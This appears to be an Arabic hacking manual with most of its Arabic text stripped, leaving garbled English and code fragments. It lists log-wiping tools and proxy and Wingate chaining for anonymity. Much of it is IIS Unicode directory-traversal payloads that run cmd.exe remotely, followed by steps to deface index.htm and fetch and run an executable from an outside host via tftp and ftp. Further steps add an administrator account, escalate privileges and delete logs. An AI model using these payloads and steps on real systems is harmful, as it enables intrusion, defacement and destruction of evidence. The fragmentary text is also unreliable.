Overwrite - just Overwrites the
.entries with zero-value bytes
Don't use such software (f.e. zap) !it can be detected
-------------------------------------------------------------LOG MODIFIER
++++++++++
233

ah-1_0b.tar Changes the entries of


accounting information
clear.c Deletes entries in utmp,
wtmp, lastlog and wtmpx
cloak2.c Changes the entries in
utmp, wtmp and lastlog
invisible.c Overwrites utmp, wtmp
and lastlog with predefines values,
so
it's better than zap. Watch out, there
! are numerous inv*.c
marryv11.c Edit utmp, wtmp, lastlog
!and accounting data - best
wzap.c Deletes entries in wtmp
wtmped.c Deletes entries in wtmp
zap.c Overwrites utmp, wtmp,
!lastlog - Don't use! Can be detected
------------------------------------------------------------------------------------:
=========
234


**********
..
.. !!
) (
..

235

"
) ( "
> <
> :<
.

Proxy - Sock Host - Wingate


) (-

+++++++++++++++++++++++++++++
+++++
236

Introduction to Proxy Server


=) proxy server:. (=
) proxy server. ( . server
.

. proxy server
.
LAN:
Local Area Network

proxy server
.

.
proxy server

/http://hackergurus.tk
proxy server .
proxy server
/http://hackergurus.tk
. server
237


:...
bit
)(
.



.
. proxey server

lucky

. .


!
. .
proxy
server

download #..
238


10.

proxy server.

Refresh
Reload
Why use a Proxy Server
=) (=
. .
.
!!!
:
ISP
Internet Service Provider
.


Traffic
.
proxy server
239




.
ip
ip .


.
.
.
proxy port
proxy server

!! (..


.
cach.microsoft.com 80

-1
-2
240

-3



.
Logs
Introduction to Wingate
=) =(Wingate

WinGate
proxy server firewall
.

) Anonymously
(
.

WinGate
:
-----------------------------------------------------------------------------------------241

dial up modem, ISDN, xDSL, cable


modem, satellite connection, or
even dedicated T1 circuits
-----------------------------------------------------------------------------------------wingate

, 23
. Telnet
the wingate
.
wingate.
) Aminstrator(
wingate
,
) Local Network
(
ipspoof ICQ -
Mirc .
wingate open wingates
. .
) Admin(
242

DIScover
. !!!



. WinGate

WinGate
SyGate
) Logs(
WinGate Server 48
) ISP's (

. wingate
How do I find Wingates
=) WinGate(=

. wingate
. .

WinGate Scanner
243

google
/http://www.google.com
ip hostname


@home
:
wingates
wingate NetWork
...
Unix :
Trial and Error
wingate 23


. ) Guest(
Anonymously
Introduction to Socks Host
=) =(Socks Host
Socks Host WinGate

244

1080

explorer and netscape


Socks Host
. Mirc.
ip FireWall

**********************

**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
-------------------------------------------
%100

245

"
) ( "
> <
> :<

...
Chaining Proxies



Chaining wingates
Telnet
)------------------------------------------ . proxy ip
Domain .
246

.
. Proxy
Ip Address
Domain ,,,
.
Proxy
:
http://www.multiproxy.org/anon_list
.htm
http://tools.rosinstrument.com/prox
/y

Group .

:
P_R_O_X_Y@yahoogroups.com



P_R_O_X_Ysubscriber@yahoogroups.com

247

Replay

)------------------------------------------=========================
. .

:
/http://www.privacy.net

/http://www.proxytester.com
Ip . !!!

..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
248

. Proxy. ):
(WebSite,IRC Chat,etc
.
.


Proxy Server
...

]User]>>>>>[Proxy]>>>>>[Web
[Pages
---------------Proxy Chaining
---------------


/
249

]
User]>>>[Proxy1]>>>[Proxy2]>>>[Pr
[oxy3]>>>[Proxy4]>>>[Destination
.


Destination = web page, Unix
server, ftp server, etc
Proxy chaining

server telnet, ftp, or http
Chaining
%100


ftp

Adminstrator Logs
proxy

. Chaining Proxy

250

Logs

.
Logs
...
---------------HTTP Chaining
--------------- HTTP chaining Proxy
Address
:
_http://proxy.magusnet.com/-http://www.google.com
) (-_-
!!!
. Chaining:
_http://proxy.server1.com/-_http://proxy.server2.com/-http://www.destination.com
251


http://anon.free.anonymizer.com/htt
p://www.google.com

) (/
http://proxy1/http://proxy2:80/proxy
3:80/http://www.yahoo.com
= proxy
.....
---------------Browser Chaining
--------------- .
Internet Explorer
----

213.234.124.23:80
252

213.234.124.23:
80:
ISP


Tools
Internet Options
Connections

Settings

) Address(
) Port(

213.234.124.23: 80:

.
Chaining Proixes

/
Address: 213.234.124.23:80
253

121.172.148.23:80 143.134.54.67
Port: 80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$

&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate proxy server

)) 23 Telnet ((
Wingates
online
.
Admin .
wingate
. !!!!
ip
23 Telnet

254

WinScan
Wingate

Download
------------------------------Chaining Wingates Using Telnet
------------------------------ Wingate .

255

DoS Telnet
.....
wingate 23

Telnet

61.133.119.130 23
Telnet:
C:\WINDOWS>telnet 61.133.119.130
23


Wingate> 203.207.173.166 23
256



Wingate> 213.17.99.45 23

Wingate> 10.65.212.7 23
wingate

WinGate>arbornet.org

C:\Windows> telnet 61.133.119.130
23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
257

Wingate>m-net.arbornet.org
Connecting to host
arbornet.org...Connected

258

"
"Logs
> . <
> :. <

.
..
Unix Multi-User Mode .
. Operation ) ( Linux
. ) . ( Unix

Unix
:
259


.
.
.
.
....
: .
( LOG File ) ...
: ...
....


IP

260

........
.
.


.
Microsoft
Windows Linux Mac

....

261


..

: .
...
) LOG
. ( File .

262

)(Web servers


) (log files

.
.
) (log file

.

.


.


- -
. :

...
. .
...
263

:

. . WIN NT

...


:
) ( )
(
...
.
. ...
..


...
264

.
. :
lastlogin.

.
.
bash_history.

contactemail.
.

Tmp trash.
. etc
.
lastlogin &.
.bash_history
. rm
bash_history.
265

:
rm .bash_history
rm .bash_history
lastlogin.
.

....
. cpanel .

..
.
localhost :
...
:

....

266



...

...
...
...
: ...
....
.
..
..
) ( HTTP Protocol
.
267


.

HTTP ....
. SOCKS Protocol
. .

. .
.
Web Proxy Service (1 .
. HTTP Protocol
WinSock Proxy Service (2
windows NT
telnet
FTP WinSock
...... Protocol
. Socks Proxy Service (3
)SSL) Secure Sockets
Layers )IIS) Internet
Information Server. Windows
NT FTP Telnet GopherIRC
RealAudio POP3
268

firewall .
... securiy
.....
. TCP/IP.
:
* )Internationa
(Organization for Standardization
** .
ransmission Control .
... Protocol TC
.

. ...
:
Ping Traceroute, DNS lookup,
Finger, Whois, LDAP, SNMP
.
. ... WIN NT :
TCP/IP . ...
. UNIX .
Router .

269




... .
). ( Router
: .
.
.....
... .
.
...
...
. :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
270

Port 111 = SunRPC


Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail

.
.
:
... HTTPort
.
.

271

TCP/IP

HTTPort
( Proxy
) Server ISP

) )
Proxy .
HTTPort

. .
. SOCKS.
.
...

272

273

274

275

276


...
( Anonymous)
18
: ... .
AnalogX Proxy
HTTP (web), HTTPS :
(secure web), POP3 (recieve mail),
SMTP (send mail), NNTP
(newsgroups), FTP (file transfer),
and Socks4/4a and partial Socks5
(no UDP) protocols! It works great
with Internet Explorer, Netscape,
AOL, AOL Instant Messenger,
Microsoft Messenger, and many
!more

277


http://www.analogx.com/files/proxyi
.exe
PortBlocker :

.
:
PortBlocker is configured to block
the most common types of servers
that might be on a system (FTP,
HTTP, etc), so will not require any
modification for most users. If you
are running a special server of
some sort, then you can easily add
278

it's ports (either TCP or UDP) to it's


list, and have them blocked and/or
.logged
Log unauthorized port access
attempts and secure internal
servers from internet access
...easily

PortBlocker
http://www.analogx.com/files/pblock
i.exe


279

.

...
.
...

...
Proxy Log Analyzer :
:

280

MB 1.07 :
http://www.mechanicalminds.com/s
oftware/pla/setup.exe
ZIP archive instructions 818 kb
http://www.mechanicalminds.com/s
oftware/pla/pla.zip

281

.
Provides a space for you to type the
address and port number of the
proxy server you want to use to
gain access to the Internet over
HTTP, Secure, FTP, Gopher, and
.Socks protocols
: .


.
282

...
.

" HTTP Port


!!"
> <
>:<
283

:
-----------------------HTTPort 3snf
-----------------------:
-----------------------



,,,,,,,,,,,,
------------------------


-----------------------http://www.angelfire.com/tv2/
ssdd63/httport3snf.zip
284

------------------------

:
------------------------ .
FAHAD

285

Port mapping

286

Add

New mapping
.

287

. .

Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN

288

Proxy

,,,


Start

289


127.0.0.1
80


..

290

" " NeoTrace


><
>< DarK_HaCKeR :

..

..
..
..
Neo Trace Express
..
http://www.neoworx.com/dow
nload/NTX325.exe

291

292

:
XDQG-2ZKN-X2PA-KTRQ
293

"
"
> <

294

> :<

:
=) (=
^^^^^^^^^^^^^^^^^^^

/http://www.netcraft.com

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
.

/http://www.almodammer.com
.
dfl;kjgk'dgjbumpipt@almodammer.c
om

295

Headers

^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners


..

Telnet Client
.
FTP 21

TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
296

Hyper Text Transfer Protocol


8080 - 80
80 Telnet

GET /qwe HTTP/1.1
400

:
HEAD 127.0.0.1 HTTP/1.1
. ...
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
ping .
ip .
!
.
ping ipsite
=ipsite

TTL=XXX
297

= XXX
.
:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255

298


: ) data list or packet.
( Nodes TTL 1
tracert
traceroute


tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^

Windows






299

:
) N-Stealth
...(
=============
( Shadow Sceurity Scanner

(
=============
( SuperScan


List (
----------------------------------------------------------------------- Linux


Nmap
) Network Maper
(

Linux
300

//
:
nmap
/
l] Nmap V. 3.00 Usage: nmap [Scan]
[Type(s)] [Options
Some Common Scan Types ('*'
(options require root privileges
sS TCP SYN stealth port scan- *
(((default if privileged (root
sT TCP connect() port scan (default(for unprivileged users
sU UDP port scan- *
sP ping scan (Find any reachable(machines
sF,-sX,-sN Stealth FIN, Xmas, or- *
(Null scan (experts only
sR/-I RPC/Identd scan (use with(other scan types
Some Common Options (none are
:(required, most can be combined
O Use TCP/IP fingerprinting to- *
301

guess remote operating system


p ports to scan. Example range: '1-'1024,1080,6666,31337
F Only scans ports listed in nmap-services
v Verbose. Its use isrecommended. Use twice for greater
.effect
P0 Don't ping hosts (needed toscan http://www.microsoft.com/ and
(others
Ddecoy_host1,decoy2[,...] Hide- *
scan using many decoys
T General timing policyn/-R Never do DNSresolution/Always resolve [default:
[sometimes resolve
oN/-oX/-oG Outputnormal/XML/grepable scan logs to
iL Get targets from file; Use '-' forstdin
S /-e Specify source address or- *
302

network interface
interactive Go into interactive-(mode (then press h for help
Example: nmap -v -sS -O
http://www.my.com/ 192.168.0.0/16
'*.*.'192.88-90
SEE THE MAN PAGE FOR MANY
MORE OPTIONS, DESCRIPTIONS,
AND EXAMPLES
!!!!!!!!!
man
page ..

nmap -sS -O -vv almodammer.com
=almodammer.com


.......
^^^^^^^^^^^^^^^^^^^
=( (=
^^^^^^^^^^^^^^^^^^^
303

Linux Shell
Account
Linux Shell
.
Linux
whois
Linux


man whois
----------------------------------------------------------------- google
?http://www.google.com/search
q=whois&btnG=Google+Search
.
cgi.

netcraft ..............

304

305

"
"
> <
>>P @ LH@CKERZ :

306

1
//:http
:
\
/http://www.XXX.com
/
2
3
4
5
6
7

307

8
9

10
11
11 10 :

12

:

.
.

308

"
) ( "
><
><sNiper_hEx :

309

) 13
( -:
. . . .
. CMD
.
. ECHO
CMD .

Access Denied
.
. FTP

310

.

. TFTP
.

311

.
IIS4.0 /
IIS5.0 . NT4 / Win2k

.

anonymous person

.

.

. -:
-1

312

.
. .
-2
.

.
. IIS4 / IIS5
CMD
.

. CMD
CMD




-:
313

:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+md+c:\hEx
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+rd+c:\hEx
:

:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+copy+c:\winnt\sy
314

stem32\cmd.exe+c:\inetpub\
scripts\hEx.exe
:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+move+c:\winnt\s
ystem32\cmd.exe+c:\inetpub
\scripts\hEx.exe+c:\
:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+del+c:\hEx.mdb

:
http://www.xxxx.com/msadc
315

/..
%c0%af../winnt/system32/c
md.exe?/c+ren+c:\index.htm
+hEx.htm

:
http://www.xxxx.com/msadc
/..%c0%af../..
%c0%af../winnt/system32/c
md.exe?/c+type+c:\hEx.txt

:
http://www.xxxx.com/msadc
/..
%c0%af../winnt/system32/c
md.exe?/c+echo+sNiper_hEx
+>c:\hEx.txt

316


:



:
http://www.xxxx.com/msadc
/hEx.mdb

.

-:
http://www.xxxx.com/scripts
/..
%c1%1c../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
317

%c0%9v../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%af../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c0%qf../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%8s../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
%c1%9c../winnt/system32/c
\:md.exe?/c+dir+c
http://www.xxxx.com/scripts
/..
318

%c1%pc../winnt/system32/c
\:md.exe?/c+dir +c

-:
Msadc , _vti_bin , iisadmpwd ,
_vit_admin , scripts ,
samples , cgi-bin


. ECHO


-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd.exe?/c+dir+c

319


w3svc.exe
inetpub\scripts
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\w3svc.exe
w3svc.exe
inetpub\scripts

-:
http://www.xxxx.com/scrip
\:ts/w3svc.exe?/c+dir+c



320

inetpub\wwwroot\index.ht
m
-:
http://www.xxxx.com/scrip
ts/w3svc.exe?/c+echo+Hac
ked+By+sNiper_hEx+hExRa
y@Hotmail.com+>+c:\inetp
ub\wwwroot\index.htm

CMD .
CMD

-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
cmd.exe?
c+copy+c:\winnt\system32

321

\cmd.exe+c:\inetpub\script
s\cmd1.exe
. CMD
-:
http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
\:cmd1.exe?c+dir+c

Access Denied .
Access Denied

Access Denied

-:
-1 CMD
CMD1
. Copy.
-:
322

http://www.xxxx.com/msad
c/..%c0%af../..
%c0%af../winnt/system32/
?cmd.exe
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\cmd1.exe
-2 ssinc.dll
-:
o test.shtml
o
wwwroot/hEx/test.shtml
o >!#--
<--"include file="AAAA[...]AA
A
2049 .
o
http://www.xxxx.com/test.sht
ml
o .

323

o
. Access Denied
o 500

.
-3 . NC.exe

Temp

Temp .
-4
.
.
-5 root.exe :
sensepost.exe shell.exe
w3svc.exe
c:\inetpub\scripts
.

324

. FTP
Scripts CMD -1
Shell.exe
/
c+copy+c:\winnt\system32
\cmd.exe+c:\inetpub\script
s\shell.exe
mspft.pll -2
open Echo
. ftp.host.com
. FTP
/
c+echo+open+ftp.host.com+
>+c:\winnt\mspft.ppl
-3
Anonymous
mspft.pll
/
shell.exe?/c+echo+anonymo
us+>>+c:\winnt\mspft.ppl
325

-4
hExRay@Hotmail.Com
mspft.pll
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl
. Anonymous User -5
mspft.pll
/
shell.exe?/c+echo+user+an
onymous+>>+c:\winnt\msp
ft.ppl
-6
/
shell.exe?/c+echo+hEx@Hot
mail.Com+>>+c:\winnt\ms
pft.ppl

326

.g

/
shell.exe?/c+echo+lcd+c:\in
etpub\wwwroot+>>+c:\win
nt\mspft.ppl
-8 FTP
. FTP Get
index.htm
/
shell.exe?/c+echo+get+inde
x.html+>>+c:\winnt\mspft.
ppl
-9 Quit
/
>>shell.exe?/c+echo+quit+
+c:\winnt\mspft.ppl
-10 FTP.exe?+"-
s:c:winnt\mspft.ppl

mspft.ppl -:
327

Open FTP.host.com Anonymous hEx@Hotmail.Com User Anonymous hEx@Hotmail.Com Get index.html Quit msadc/..%c0%af../../
%c0%af../winnt/system32/
ftp.exe?+""s:c:\winnt\mspft.ppl

.
Microsoft )
. ( Access L0phtCrack
-:
\ _ .SAM
328

\winnt\repair
L0phtCrack
-:


PASSFILT.DLL

-:
HKEY_LOCAL_MACHINE\SYS
TEM\CurrentControlSet\Cont
rol\Lsa\SYSTEM32\PASSFIL
T.DLL

329

. ASP
MySQL

) ( htr.+
-:
http://www.xxxx.com/defa
ult.asp+.htr



database.inc
.
.


. TFTP
-1
index.htm \:c
330

-2 TFTP
.

331

c+tftp.exe+"-/
i"+1.1.1.1+GET+index.ht
m+C:\inetpub\wwwroot
\index.htm
.
tftp.ex

e

.
""i-

1.1.1.1

.
GET

index.

htm
\
inetpu

b\ww
\wroot

index.
332

htm

.
Log
System32 -:
/
c+del+c:/winnt/system32/lo
gfiles/*.log

333

"
) ( "
> . <

334


..
..

:
------------- )(
. cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe
.. Echo
CMD1.exe
) ( !
..

IWAM_USER .
Guest
. IIS
335

Guest
!! (:

(: * nix Microsot
(:
Administrator
(:

..
.
(: .
..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:
336


:
Sechole - 1
.. )
(
..
. . . (:
Tlist - 2.
.. +
(:
Kill.exe -3 .
.
NCX99 -3 NC
99
TFTP32.exe -4 ..

(:
:
337

..
ncx99.exe :
http://target/scripts/..../winnt/syst
em32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD =
. Guest
.. TLIST
..
PID ..
..
PID
..
Kill :
.. KILL.exe PID PID (:
!
..
Sechole ..
338

. ..
(: Sechole.exe .

IWAM_USER
.. Administrators

. Access Denided

:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..


... (:
:
IWAM_USER

339

: ..
!
.
.
(: .. .
Administrator
.

!! (: (:
:
net user Demon pass /add && net
localgroup administrators Demon
/add Save as . add.bat
: .
Demon Pass
(: ..
add.bat
) (
(:
.. (:

340

(:
)
!(
.
..

netstat -an
..
(:
90%
(: 139
(:

(:
.. . (:
.
..
. GUI
341

..

GEtAdmin Sechole2
.. WINvnc

342

"
"

343

><
> : <


:
(1
(2 TFTPD
(3
=============================
====================
=============================
====================
(1

/http://www.devil2k.com
)) ((
msadc/..%255c../..%255c../../
%255c../winnt/system32/cmd.exe?/c
\:+dir+c

344

msadc/../
%25%35%63../..%25%35%63../..%25
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/..%255c..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
msadc/../
%25%35%63..%25%35%63..%25%35
%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/..%252f..%252f..%252f../
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c

345

msadc/..%255c../..%255c../../
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
msadc/..%%35c../..%%35c../..%/
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
msadc/..%%35%63../..%/
%35%63../..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/../
%25%35%63../..%25%35%63../..%25
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
MSADC/..%255c..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
MSADC/..%%35c..%%35c..%%35c../
%
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
346

MSADC/..%%35%63..%%35%63..%/
%35%63..%
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
MSADC/../
%25%35%63..%25%35%63..%25%35
%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
vti_bin/..%255c..%255c..%255c.._/
%255c..
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
vti_bin/..%%35c..%%35c..%%35c.._/
%%35c..%
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
vti_bin/..%%35%63..%%35%63..%_/
%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
347

%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
PBServer/..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
PBServer/..%%35c..%%35c..%/
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
PBServer/..%%35%63..%/
%35%63..%
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
PBServer/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
Rpc/..%255c..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
Rpc/..%%35c..%%35c..%/
%35cwinnt/system32/cmd.exe?/c+di
\:r+c
348

Rpc/..%%35%63..%%35%63..%/
%35%63winnt/system32/cmd.exe?/c
\:+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
vti_bin/..%255c..%255c..%255c.._/
%255c..
%255c../winnt/system32/cmd.exe?/c
\:+dir+c
vti_bin/..%%35c..%%35c..%%35c.._/
%%35c..%
%35c../winnt/system32/cmd.exe?/c+
\:dir+c
vti_bin/..%%35%63..%%35%63..%_/
%35%63..%%35%63..%
%35%63../winnt/system32/cmd.exe?
\:/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35
349

%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
samples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
cgi-bin/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
iisadmpwd/..%252f..%252f..%252f../
%252f..%252f..
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
vti_cnf/..%255c..%255c..%255c.._/
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
adsamples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
350

scripts/..%C1%1C..%C1%1C../
%C1%1C..
%C1%1Cwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%C1%9C..%C1%9C../
%C1%9C..
%C1%9Cwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%C0%AF..%C0%AF../
%C0%AF..
%C0%AFwinnt/system32/cmd.exe?/
\:c+dir+c
scripts/..%252f..%252f..%252f../
%252fwinnt/system32/cmd.exe?/c+d
\:ir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
351

scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%pc../winnt/system32/cmd.exe?
\:/c+dir+c
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
352

vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%pc../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
353

scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%e0%80%af../winnt/system32/cmd.e
\:xe?/c+dir+c
scripts/../
%f0%80%80%af../winnt/system32/c
\:md.exe?/c+dir+c
scripts/../
%f8%80%80%80%af../winnt/system3
\:2/cmd.exe?/c+dir+c
scripts/..%fc/
%80%80%80%80%af../winnt/system
\:32/cmd.exe?/c+dir+c
354

msadc/..\%e0\%80\%af../..\/
%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.
\:exe\?/c+dir+c
cgi-bin/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
samples/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
iisadmpwd/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_cnf/..%c0%af..%c0%af.._/
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
vti_bin/..%c0%af..%c0%af.._/
%c0%af..%c0%af..
355

%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
adsamples/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c

(2 TFTPD

/http://iisbughelp.4t.com

(3

) (
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
\C:
356

scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+D
\D:
scripts]/..%c0%af../..%c0%af../..]/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+E
\E:

.

)) ((
(1 msadc
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+C
357

IIS )) ((
:
C:\Inetpub\wwwroot

D:\Inetpub\wwwroot

E:\Inetpub\wwwroot
C


msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c

:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+dir+C:\Inetpub\wwwroot
358


)
( wwwroot

wwwroot
.

index.htm

)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp

wwwroot index.htm
.

359

. index.htm
ss.htm

. c+dir c+ren
))
Dos Command
Prompt

:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm
ss.htm
(:
A


!!!Hacked
index.htm
360


TFTP



. TFTP
)

(
\ C:

index.htm \C:
\C:

C:\inetpub\wwwroot
))
(( TFTP
.
361

TFTP
)) (( .



:
tftp.exe -i XXX.XXX.XXX.XXX get
index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX
((
.
index.htm
wwwroot





:

362

"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm
(:
TFTP
index.htm

:
msadc/..%c1%9c../..%c1%9c../../
?%c1%9c../winnt/system32/cmd.exe
"/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.ht
m+C:\Inetpub\wwwroot\index.htm

)) (( (:
: . EXE
:
EXE
hunter.exe

363

:
.
C:\ index.htm
:
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+tftp.exe+"i"+XXX.XXX.XXX.XXX+GET+hunter.
exe+C:\hunter.exe

msadc/..%c1%9c../..%c1%9c../../
%c1%9c../hunter.exe

msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?
/c+hunter.exe

364


*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.log/s


tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
c+del+C:\*.tmp/s



))
((

bat

365

. .


))
(( system32
_______________________________
_______________________________
__________________
:

tftp
))
(( system32
)) ((
.
.


IIS Secure IIS
Eeye
366


)) ((
%90 . IIS
)) .
(( .

" " IIS


> .<
>< DEMON :
-------- - :
--------367

IIS
..

.. .
.
-------- - :
--------
